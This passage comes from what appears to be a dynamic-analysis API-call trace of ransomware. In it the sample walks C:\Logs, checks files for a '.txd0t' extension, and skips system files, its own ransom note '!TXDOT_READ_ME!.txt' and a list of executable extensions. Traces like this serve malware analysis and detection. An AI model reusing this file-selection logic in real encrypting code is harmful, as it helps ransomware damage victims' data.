psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.894] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" [0071.894] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned=".evtx" [0071.894] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="bootsect.bak") returned 1 [0071.894] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="iconcache.db") returned 1 [0071.895] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="thumbs.db") returned -1 [0071.895] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2=" ransomware ") returned 1 [0071.895] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2=" ransom ") returned 1 [0071.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="debug.txt") returned 1 [0071.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="boot.ini") returned 1 [0071.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="desktop.ini") returned 1 [0071.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="autorun.inf") returned 1 [0071.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="ntuser.dat") returned -1 [0071.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="ntldr") returned -1 [0071.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="ntdetect.com") returned -1 [0071.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="bootfont.bin") returned 1 [0071.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.929] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned=".evtx" [0071.929] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.929] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.929] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.930] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.930] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.930] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.930] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.930] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cAlternateFileName="MI1E8D~1.EVT")) returned 1 [0071.930] StrCmpW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2=".") returned 1 [0071.930] StrCmpW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="..") returned 1 [0071.930] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.930] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.930] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" [0071.930] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned=".evtx" [0071.930] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2=" ransom ") returned 1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="debug.txt") returned 1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="boot.ini") returned 1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="ntldr") returned -1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.930] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.930] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned=".evtx" [0071.930] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.930] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.930] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.931] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.931] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.931] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.931] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.931] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cAlternateFileName="MID067~1.EVT")) returned 1 [0071.931] StrCmpW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2=".") returned 1 [0071.931] StrCmpW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="..") returned 1 [0071.931] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.931] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.931] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" [0071.931] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned=".evtx" [0071.931] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.931] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.931] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.931] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.931] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.931] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2=" ransom ") returned 1 [0071.931] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="debug.txt") returned 1 [0071.931] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="boot.ini") returned 1 [0071.931] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.931] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="ntldr") returned -1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.932] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned=".evtx" [0071.932] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.932] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.932] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.932] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.932] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.932] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.932] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.932] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cAlternateFileName="MIDE4D~1.EVT")) returned 1 [0071.932] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2=".") returned 1 [0071.932] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="..") returned 1 [0071.932] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.932] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.932] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" [0071.932] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned=".evtx" [0071.932] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="bootsect.bak") returned 1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="iconcache.db") returned 1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="thumbs.db") returned -1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2=" ransomware ") returned 1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2=" ransom ") returned 1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="debug.txt") returned 1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="boot.ini") returned 1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="desktop.ini") returned 1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="autorun.inf") returned 1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="ntuser.dat") returned -1 [0071.932] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="ntldr") returned -1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="ntdetect.com") returned -1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="bootfont.bin") returned 1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.933] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned=".evtx" [0071.933] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.933] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.933] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.933] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.933] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.933] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.933] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.933] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cAlternateFileName="MI36C5~1.EVT")) returned 1 [0071.933] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2=".") returned 1 [0071.933] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="..") returned 1 [0071.933] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.933] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.933] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" [0071.933] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned=".evtx" [0071.933] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2=" ransom ") returned 1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="debug.txt") returned 1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="boot.ini") returned 1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="ntldr") returned -1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.933] StrCmpIW (psz1="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.934] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned=".evtx" [0071.934] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.934] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.934] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.934] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.934] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.934] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.934] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.934] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Known Folders API Service.evtx", cAlternateFileName="MI86D6~1.EVT")) returned 1 [0071.934] StrCmpW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2=".") returned 1 [0071.934] StrCmpW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="..") returned 1 [0071.934] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.934] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.934] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Known Folders API Service.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" [0071.934] PathFindExtensionW (pszPath="Microsoft-Windows-Known Folders API Service.evtx") returned=".evtx" [0071.934] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="bootsect.bak") returned 1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="iconcache.db") returned 1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="thumbs.db") returned -1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2=" ransomware ") returned 1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2=" ransom ") returned 1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="debug.txt") returned 1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="boot.ini") returned 1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="desktop.ini") returned 1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="autorun.inf") returned 1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="ntuser.dat") returned -1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="ntldr") returned -1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="ntdetect.com") returned -1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="bootfont.bin") returned 1 [0071.934] StrCmpIW (psz1="Microsoft-Windows-Known Folders API Service.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.934] PathFindExtensionW (pszPath="Microsoft-Windows-Known Folders API Service.evtx") returned=".evtx" [0071.934] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.934] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.935] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.935] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.935] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.935] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.935] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.935] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb7386e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbb7386e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-LiveId%4Operational.evtx", cAlternateFileName="MI4C58~1.EVT")) returned 1 [0071.935] StrCmpW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2=".") returned 1 [0071.935] StrCmpW (psz1="Microsoft-Windows-LiveId%4Operational.evtx", psz2="..") returned 1 [0071.935] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" 